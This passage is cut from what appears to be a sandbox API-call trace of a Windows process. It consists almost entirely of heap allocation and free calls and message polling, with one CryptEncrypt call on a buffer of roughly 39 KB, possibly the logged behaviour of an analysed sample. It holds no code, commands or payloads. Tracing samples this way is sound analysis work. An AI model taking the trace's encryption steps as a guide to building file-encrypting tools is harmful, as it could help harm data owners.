dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x9908) returned 1 [0151.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0151.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0151.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0151.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0151.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0151.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0151.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0151.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0151.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0151.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0151.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0151.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0151.673] CharLowerBuffW (in: lpsz="byte[39176]", cchLength=0xb | out: lpsz="byte[39176]") returned 0xb [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0151.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0151.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0151.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0151.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0151.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0151.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0151.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0151.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0151.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0151.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0151.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0151.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0151.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0151.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0151.676] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.781] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.781] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0151.781] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.818] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0151.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50cb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0151.819] CryptEncrypt (in: hKey=0xa87350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f27230*, pdwDataLen=0x8cef60*=0x9904, dwBufLen=0x9908 | out: pbData=0x2f27230*, pdwDataLen=0x8cef60*=0x9908) returned 1 [0151.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0151.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0151.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0151.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0151.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0151.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0151.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0151.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0151.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0151.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0151.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0151.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0151.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0151.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0151.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0151.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0151.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0151.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0151.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0151.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0151.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0151.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0151.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0151.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0151.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0151.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0151.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0151.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0151.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0151.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0151.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0151.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0151.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0151.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0151.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0151.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0151.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0151.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0151.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0151.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 